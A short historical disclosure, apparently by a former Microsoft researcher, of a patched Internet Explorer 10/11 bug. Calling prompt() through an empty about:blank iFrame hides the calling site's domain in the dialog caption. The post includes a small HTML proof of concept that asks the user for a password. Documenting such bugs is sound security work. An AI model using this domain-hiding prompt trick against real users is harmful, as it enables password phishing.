A simpler variant of the earlier MHTML-based prompt bypass: placing an empty about:blank iFrame on the page and calling prompt through its window object produces the generic “Explorer User Prompt” caption instead of the calling domain, without needing an MHTML file at all.

<input value="Show domain" type="button"
  onclick="window.prompt('Enter your password', '')"/>

<input value="DO NOT show domain" type="button"
  onclick="window[0].prompt('Enter your password', '')"/>

<iframe src="" width="1" height="1"></iframe>

The iFrame with an empty src loads as about:blank. Invoking prompt through window[0] — the about:blank frame — bypasses the domain attribution that was added as a security improvement. The dialog shows “Explorer User Prompt” instead of the actual site name. Tested on IE10 / IE11 build 20130227-2100.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.